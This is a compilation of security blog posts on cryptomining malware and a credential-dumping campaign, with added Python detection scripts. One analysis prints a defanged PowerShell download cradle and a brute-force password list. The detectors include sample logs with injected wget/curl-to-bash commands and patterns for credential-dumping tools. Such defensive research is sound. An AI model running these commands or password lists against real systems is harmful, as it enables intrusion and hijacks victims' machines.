
Miner Malware Uses Multiple Propagation Methods to Infect Windows Machines and to Drop Monero Miner


Miner malware that uses a number of techniques, including EternalBlue, PowerShell abuse, the pass-the-hash technique, Windows admin tools, and brute force, to infect Windows machines and drop a Monero miner. According to Trend Micro telemetry, the threat actors behind the campaign are expanding the botnet to other countries, including Australia, Taiwan, Vietnam, Hong Kong, […]

The post Miner Malware Uses Multiple Propagation Methods to Infect Windows Machines and to Drop Monero Miner appeared first on GBHackers On Security.


Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse

By Augusto Remillano II and Arvin Macaraeg

We detected malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using the pass-the-hash technique, Windows admin tools, and brute-force attacks with publicly available code. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.

It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.

Propagation and Behavior

The malware (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primarily propagates by trying a list of weak credentials to log into other computers on the network. Instead of sending itself directly to every reachable system, the remote command changes the firewall and port-forwarding settings of the infected machine and sets up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with:

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

123456, password, PASSWORD, football, welcome, 1, 12, 21, 123, 321, 1234, 12345, 123123, 123321, 111111, 654321, 666666, 121212, 000000, 222222, 888888, 1111, 555555, 1234567, 12345678, 123456789, 987654321, admin, abc123, abcd1234, abcd@1234, abc@123, p@ssword, P@ssword, p@ssw0rd, P@ssw0rd, P@SSWORD, P@SSW0RD, P@$$w0rd, P@$$word, P@$$w0rd, iloveyou, monkey, login, passw0rd, master, hello, qazwsx, password1, qwerty, baseball, qwertyuiop, superman, 1qaz2wsx, fuckyou, 123qwe, zxcvbn, pass, aaaaaa, love, administrator

Table 1. List of weak passwords used for primary propagation.

It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:

Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.

The malware also uses the pass-the-hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored on the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware uses Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.

Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.

If successful, it deletes the file %Start Menu%\Programs\Startup\run.bat, likely a file dropped by an older version of the malware. It also drops the following:

  • %Application Data%\flashplayer.tmp
  • %Application Data%\sign.txt – used to indicate that the machine is already infected
  • %Start Menu%\Programs\Startup\FlashPlayer.lnk – responsible for executing the dropped .tmp script at startup

If the user has a stronger password, the malware uses EternalBlue to propagate.

Figure 3. Exploit payload.

Once a machine is infected via one of these methods, the malware acquires the MAC address and collects information on the anti-virus products installed on the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server; analysis revealed that the download URL sends the information acquired earlier back to its handler. The downloaded PowerShell script is a dropper responsible for downloading and executing the malware’s components, most of which are copies of itself.

Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.

To check whether its components are already installed, the malware looks for the following files:

  • %Temp%\kkk1.log
  • %Temp%\pp2.log
  • %Temp%\333.log
  • %Temp%\kk4.log
  • %Temp%\kk5.log

Figure 5. Checking for installed malware components.

Each $flagX represents a component. If $flag is still unset, the malware downloads a newer version of the PowerShell dropper script and installs a scheduled task to run it regularly; the malware’s behavior depends on the privilege level it was run with. $flag2 likewise downloads a copy of the malware from a different URL and creates a differently named scheduled task.

Figure 6. $flag and $flag2 for scheduled tasks.

The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:

  • Computer Name
  • Machine’s GUID
  • MAC Address
  • OS Version
  • Graphics Memory Information
  • System Time

The fourth component is a Python-compiled binary executable that further propagates the malware and is also capable of pass-the-hash attacks, dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).

Figure 7. Dropping the fourth executable component.

Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.

The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands via xp_cmdshell once it gains access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited with EternalBlue, reusing publicly available code from previous exploits.

Figure 9. Scanning for vulnerable database servers.

The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.

The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.

Figure 10. PowerShell script that downloads and executes the miner payload.

Figure 11. Executing the miner payload.
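An added detection example, not code from the Trend Micro analysis: a Python scan over constructed PowerShell ScriptBlock (event 4104) and process-creation (event 4688) log lines for the download cradle, the reused tool names, the scheduled-task persistence and the dropped marker files described above, decoding any -EncodedCommand payload first so an obfuscated launch does not slip past. The log line layout and the example[.]invalid URL are assumptions.

```python
import base64
import re

# Indicators taken from the write-up above: the download cradle, the publicly available PowerShell
# tools the malware reuses, its scheduled-task persistence and its dropped marker files.
INDICATORS = {
    "download cradle": re.compile(r"New-Object\s+Net\.WebClient\)\s*\.downloadstring\(", re.I),
    "Invoke-WMIMethod lateral movement": re.compile(r"\bInvoke-WMIMethod\b", re.I),
    "Get-PassHashes credential dump": re.compile(r"\bGet-PassHashes\b", re.I),
    "Invoke-SMBClient pass-the-hash": re.compile(r"\bInvoke-SMBClient\b", re.I),
    "Invoke-ReflectivePEInjection in-memory payload": re.compile(r"\bInvoke-ReflectivePEInjection\b", re.I),
    "xp_cmdshell via SQL Server": re.compile(r"\bxp_cmdshell\b", re.I),
    "scheduled task persistence": re.compile(r"schtasks(?:\.exe)?\s+/create|\bRegister-ScheduledTask\b", re.I),
    "dropped marker file": re.compile(
        r"flashplayer\.tmp|\bsign\.txt\b|\bkkk1\.log\b|\bpp2\.log\b|\b333\.log\b|\bkk4\.log\b|\bkk5\.log\b",
        re.I),
}

# powershell.exe -e / -enc / -EncodedCommand takes base64 of UTF-16LE text (a documented PowerShell
# option); decoding it exposes the real command so indicators hidden inside it are not missed.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded_commands(text):
    """Return text plus the decoded form of any -EncodedCommand payloads it carries."""
    decoded = []
    for m in ENCODED_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):  # not base64 / not UTF-16LE: leave it alone
            continue
    return text + " " + " ".join(decoded) if decoded else text


def scan_script_blocks(lines):
    """Return (line_number, indicator_name) pairs for every indicator found in each line."""
    hits = []
    for number, line in enumerate(lines, 1):
        text = expand_encoded_commands(line)
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((number, name))
    return hits


# Constructed sample log lines (not real telemetry). Line 3 carries an encoded command built
# here so the sample stays readable; the URL is a placeholder, not the campaign's domain.
ENCODED_SAMPLE = base64.b64encode("Invoke-WMIMethod -Class Win32_Process".encode("utf-16-le")).decode()
SAMPLE_LINES = [
    r"4104 ScriptBlock: Get-ChildItem C:\Users\alice\Documents",
    "4104 ScriptBlock: IEX (New-Object Net.WebClient).downloadstring('hxxp://v.example[.]invalid/wm?hp')",
    "4688 Process: powershell.exe -nop -w hidden -e " + ENCODED_SAMPLE,
    '4104 ScriptBlock: schtasks /create /sc minute /mo 30 /tn "FlashPlayer" /tr "powershell -nop -w hidden -File C:\\x.ps1"',
    r'4104 ScriptBlock: Test-Path "$env:APPDATA\sign.txt"',
    "4104 ScriptBlock: Get-Process | Where-Object { $_.CPU -gt 100 }",
]

if __name__ == "__main__":
    for number, name in scan_script_blocks(SAMPLE_LINES):
        print(f"line {number}: {name}")
```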

Conclusion

We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs itself using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and the growing amount of publicly available open-source code, we can expect to see more complex malware like this. And while the system information collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to each machine and may be used to trace, identify, and track users and activities.

Figure 12. Malware’s new URL.

We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also apply virtual patches from credible sources. As of this writing, the malware is still active and has been updated to connect to a new URL. Use complex passwords, and enable layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.

Indicators of Compromise


Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.

The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .

This post appeared first on Trend Micro Blog
Author: Trend Micro


Credential Dumping Campaign Hits Multinational Corporations

Server Misconfigurations Result in Ongoing Theft of Corporate Credentials, Cryptojacking Infections on User and Enterprise Assets

IBM X-Force Incident Response and Intelligence Services (IRIS), our team of veteran incident response and intelligence professionals, responds to cyberattacks taking place in different parts of the globe.

In a recent investigation, our team discovered that multinational corporations in various sectors are being targeted by attackers using malicious scripts to automate attacks on misconfigured servers. The attacks resulted in a continuous credential dumping campaign that exfiltrated the corporate credentials of infected network users. On the other side of the compromised servers, attackers continue to operate a public File Transfer Protocol (FTP) server that collects credentials from additional compromised networks and then sends them to a third host, presumably into the attackers’ hands for later use.

On top of the credential theft, the attackers behind this campaign infect devices with cryptocurrency miners.

Let’s examine the technical details of this live campaign to shed more light on attacker tactics, techniques and procedures (TTPs) and outline some tips to help defenders prevent this sort of active leak.

IBM X-Force duly reported this ongoing operation to law enforcement in the corresponding jurisdictions.

Automation and Windows OS Tools Make for a Stealthy Operation

In a malicious campaign X-Force IRIS discovered in February 2019, the team found that some of the top adversarial tactics reported by IBM to target organizations in the wild are being actively used against unsuspecting organizations:

  • Exploiting misconfigured servers and Windows-based client-side operating systems;
  • Living off the land by using embedded operating system tools; and
  • Automating attacks using malicious PowerShell scripts.

The attack campaign harvests corporate credentials from a number of compromised networks, most likely for the same reason across the board: server misconfigurations that leave various ports open and unprotected, and weak administrator passwords without second-factor authentication enforced.

The attackers in this ongoing campaign are using PowerShell scripts and automation to exploit the servers with the DoublePulsar kernel exploit. They also take advantage of Transmission Control Protocol (TCP) port 445 for communicating with the network — a Server Message Block (SMB) port that has been exploited in previous attacks, including WannaCry and NotPetya, for lateral movement.

A look at the distribution of victimized devices reveals that while most of them could be user devices (Win7), the second-most targeted asset type is Windows Server 2008.


Figure 1: Distribution of affected devices per OS version

Multistage Malicious Script Fetches and Runs Malware Files

To get to network users and harvest their credentials, the attackers in this campaign begin with a malicious script. The script fetches and runs additional files via PowerShell, enabling it to use Mimikatz and PowerSploit on the targeted devices to dump the user’s credentials.

An excerpt of the script appears below (please note that this article does not provide a comprehensive analysis of the malicious service’s installation script).


Figure 2: Malicious script installs attacker’s Windows service

The overall goal of the script is to fetch additional malcode from various rogue hosts maintained by the attackers. Below are two of the main components of the attacks:

  1. s.txt
  2. up.txt

We can see those being pulled from a remote server hosted at hxxp://74.222.1.38. With WHOIS data protected, we could only note that the host is dedicated server infrastructure, likely rented out to the attackers or exploited for their attacks.


Figure 3: Malicious script installs attacker’s Windows service

A Closer Look at Malicious File ‘Up.txt’

Looking into the activity launched by the extra files fetched into the compromised devices, we could see that the code is executed and performs the following actions:

  • Collects the private and public IP address of the infected device and identifies the public IP address via hxxp://2019.ip138.com/ic.asp.
  • Enumerates the device’s OS version and live processes from the system using WMI queries.
  • Downloads and executes Mimikatz from GitHub.
  • Creates an output file with process information and dumped credentials. File names attributed to each file are structured as follows: PublicIP_PrivateIP_OSVersion_CPUload.txt. For example: 79.XXX.XX.12_192.168.37.147_Microsoft Windows 7 Ultimate [6.1.7601]_5%.txt.
  • Uploads output file to a public FTP server using the attacker’s hardcoded credentials.

While the attackers placed the hardcoded credentials for their malicious FTP server in plain view, they ensured that unwelcome access would receive read-only rights. That means outsiders cannot grab existing content on the FTP server.

Output files containing stolen system information and network credentials arrive at the FTP server but only remain there for a few seconds before being exfiltrated onward to another server and deleted from the FTP server.
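An added example that is not part of the X-Force write-up: a Python parser for the PublicIP_PrivateIP_OSVersion_CPUload.txt naming scheme described above, applied to constructed FTP transfer log lines to produce the kind of per-day, per-IP and per-OS statistics the article reports. The log line layout (date, time, FTP verb, file name) and all addresses are assumptions.

```python
import ipaddress
import re
from collections import Counter

# Naming scheme described in the write-up: PublicIP_PrivateIP_OSVersion_CPUload.txt
# The OS field can contain spaces and brackets, so it is matched lazily between the fixed parts.
UPLOAD_NAME = re.compile(
    r"^(?P<public>\d{1,3}(?:\.\d{1,3}){3})_"
    r"(?P<private>\d{1,3}(?:\.\d{1,3}){3})_"
    r"(?P<os>.+?)_"
    r"(?P<load>\d{1,3})%\.txt$"
)


def parse_upload_name(name):
    """Return the victim record encoded in a file name, or None if it does not follow the scheme."""
    m = UPLOAD_NAME.match(name)
    if not m:
        return None
    try:
        public = ipaddress.ip_address(m["public"])
        private = ipaddress.ip_address(m["private"])
    except ValueError:  # e.g. an octet above 255
        return None
    return {
        "public_ip": str(public),
        "private_ip": str(private),
        "os": m["os"],
        "cpu_load": int(m["load"]),
        # A genuine victim record carries an RFC 1918 address in the second field.
        "private_is_private_range": private.is_private,
    }


def summarize_uploads(log_lines):
    """Aggregate STOR events whose file names match the scheme into campaign-style statistics."""
    records = []
    for line in log_lines:
        parts = line.split(" ", 3)  # date, time, FTP verb, file name (the name may contain spaces)
        if len(parts) != 4 or parts[2] != "STOR":
            continue
        record = parse_upload_name(parts[3])
        if record is None:
            continue
        record["day"] = parts[0]
        records.append(record)
    hosts_behind = {}
    for r in records:
        hosts_behind.setdefault(r["public_ip"], set()).add(r["private_ip"])
    return {
        "uploads": len(records),
        "unique_public_ips": len(hosts_behind),
        "per_day": dict(Counter(r["day"] for r in records)),
        "per_os": dict(Counter(r["os"] for r in records)),
        # Several private hosts behind one public IP means more than one compromised device per organization.
        "hosts_per_public_ip": {ip: len(hosts) for ip, hosts in hosts_behind.items()},
    }


# Constructed FTP transfer log (not real data); documentation and RFC 1918 addresses only.
SAMPLE_FTP_LOG = [
    "2019-02-14 10:03:11 STOR 203.0.113.5_192.168.37.147_Microsoft Windows 7 Ultimate [6.1.7601]_5%.txt",
    "2019-02-14 10:03:12 STOR 203.0.113.5_192.168.37.148_Microsoft Windows Server 2008 R2 [6.1.7601]_12%.txt",
    "2019-02-14 10:04:02 STOR 198.51.100.17_10.0.0.23_Microsoft Windows 7 Professional [6.1.7601]_3%.txt",
    "2019-02-15 08:15:40 STOR 198.51.100.17_10.0.0.23_Microsoft Windows 7 Professional [6.1.7601]_7%.txt",
    "2019-02-15 08:16:01 STOR readme.txt",
    "2019-02-15 08:16:05 DELE 203.0.113.5_192.168.37.147_Microsoft Windows 7 Ultimate [6.1.7601]_5%.txt",
]

if __name__ == "__main__":
    print(summarize_uploads(SAMPLE_FTP_LOG))
```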

How Much Is Too Much? Campaign Statistics

Statistics of uploaded data to the malicious FTP server show that the activity is generating a large number of uploads from compromised devices. While the number of uploads is large, file sizes are very small, likely because they only contain a few strings of textual information. The following image shows the accumulation of data on the public FTP server within 60 seconds:


Figure 4: Rapid accumulation of victims’ stolen data on public FTP server

Judging by the number of unique IP addresses from which the data is being streamed into the attackers’ FTP — close to 85,000 IPs — we are seeing that the scope of the campaign is meaningful.

The following numbers accumulated over the period of 11 days provide further context about the size of this malicious operation:

Affected countries per IP geo-location analysis: 180 – ongoing

Files uploaded from infected devices: 1,663,156 – ongoing

Unique IP addresses uploading stolen data: 84,683 – ongoing

Files exfiltrating large amounts of data: 59,688 – ongoing

Files exfiltrating small amounts of data: 933,994 – ongoing

The campaign’s scope can be estimated through the number of uploads per day, showing many devices are likely compromised in each organization.

Figure 5: A sample of campaign dates showing the scope of stolen data dropped daily

A view of the location of infected devices affected by this campaign reveals that the largest number is located in China, Taiwan and Russia. This may be part of a nation-sponsored campaign by regional threat actors targeting organizations and government entities in Asia.


Figure 6: Campaign’s country distribution per geo-IP location

All in an Attacker’s Workday

The TTPs used in this malicious campaign by unknown attackers read almost like a page from an attacker’s playbook. Using automated tools, living off the land, using PowerShell and infecting devices with cryptominers are the top tactics highlighted by IBM X-Force’s “Threat Intelligence Index.”

Below are some tips to protect assets against this sort of attack and help prevent initial access to externally facing servers and user devices:

  • Ensure systems are fully patched.
  • Perform regular vulnerability scans to identify missing security updates.
  • Keep antivirus and anti-malware solutions up to date and configure them to automatically conduct regular scans.
  • Manage usage of privileged accounts. Implement the principle of least privilege. Do not assign administrative access to users unless absolutely needed.
  • Enhance security of WMI by authorizing WMI users and restricting permissions.
  • Enable host-based firewalls and restrict internal communications to limit unnecessary lateral movement.
  • Close ports on externally facing servers.
  • If ports remain open, secure them with the necessary controls or place compensating controls as needed.
  • Monitor communication via SMB ports to external servers and investigate suspicious cases of data regularly leaving the organization.
  • Disable SMB v1 and similar legacy protocols completely.

Campaign IoCs

This malicious activity is still ongoing at the time of this writing. Security professionals who wish to use indicators of compromise (IoCs) from the campaign to defend their networks can receive additional data via X-Force Exchange.

The post Credential Dumping Campaign Hits Multinational Corporations appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Thanassis Diogos


Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
  2. Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get into user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, attackers have attempted to plant malicious images on victims’ machines using wget and curl shell commands when victims simply visit a malicious page via a link in an email or through a compromised site.

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor infecting a web server or website and then injecting a cryptomining script into an otherwise legitimate website. Alternatively, the script can be inserted into an online advertisement, whether malicious or wholly illegitimate, and used with a legitimate ad service so that the script runs every time the browser is open.

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but they can also be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. As a result of frequent use of Coinhive scripts in cryptojacking attacks, users and security professionals would often see the name “Coinhive” or “Coinhive.Miner” appear as a malicious issue. In March 2019, Coinhive voluntarily ceased operations.


Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. Since the browser is merely an application on a device, it cannot generate the same computing power as infecting the actual device. As a result, this type of cryptojacking takes much longer to generate each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate. A reduced hash rate makes mining each coin less computationally intensive, making cryptojacking a more profitable option despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.


Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.


Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

cryptocurrency, cryptocurrency miner, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Injection Attacks, Malware, Risk Management, Threat Intelligence,

Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
  2. Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get onto servers and user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, the injected commands used wget and curl to fetch the miner binary and drop it on the compromised host; on the client side, victims have been infected simply by visiting a malicious page via a link in an email or through a compromised site.
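The delivery pattern above leaves a recognizable trace in web server logs: a request parameter that breaks out into a shell and calls wget or curl. The following is an added example written for this article, not IBM X-Force tooling, that scans Apache combined-format access logs for that pattern. The log lines are constructed samples, and the IP addresses, hostnames and paths in them are placeholders.

```python
"""Added example (not IBM X-Force code): flag web requests that smuggle a
wget/curl download into an application parameter, the command-injection
delivery the article describes. The log lines are constructed samples in
Apache "combined" format; the IPs, hostnames and paths are placeholders."""
import re
from urllib.parse import unquote_plus

# Constructed sample access log: two benign requests, one bare command probe,
# and two injected download-and-execute chains (URL-encoded, as they arrive).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2019:10:01:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2019:10:01:40 +0000] "GET /plugins/vuln/ajax.php?cmd=id HTTP/1.1" 200 88 "-" "curl/7.64.0"
198.51.100.4 - - [12/Mar/2019:10:02:03 +0000] "GET /cgi-bin/lookup.cgi?host=example.com%3Bwget%20http%3A%2F%2F198.51.100.50%2Fmine.sh%20-O%20%2Ftmp%2Fm.sh%3Bsh%20%2Ftmp%2Fm.sh HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2019:10:02:10 +0000] "POST /api/convert HTTP/1.1" 200 12 "-" "python-requests/2.21"
203.0.113.9 - - [12/Mar/2019:10:03:55 +0000] "GET /admin/tools.php?ip=127.0.0.1%7C%7Ccurl%20-s%20http%3A%2F%2F198.51.100.50%2Fx.sh%7Cbash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# A downloader that follows a shell separator (or opens the value). The set
# ; | & ` $( and newline covers the usual ways of chaining onto a parameter.
DOWNLOADER_RE = re.compile(r'(?:^|[;|&`\n$(])\s*(?:wget|curl)\b[^;|&`\n]*', re.I)
# Something that runs what was fetched: "| sh", "; sh /tmp/x", "; chmod ..."
EXEC_RE = re.compile(r'(?:^|[;&|])\s*(?:(?:ba|da|z)?sh|chmod|python|perl)\b')
URL_RE = re.compile(r'https?://[^\s\'"`;|&]+', re.I)


def decode_repeatedly(value, rounds=3):
    """URL-decode until stable: double encoding is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_target(target):
    """Return (path, [decoded parameter values]) for a request target."""
    path, _, query = target.partition("?")
    values = []
    for pair in query.split("&") if query else []:
        _, _, raw = pair.partition("=")
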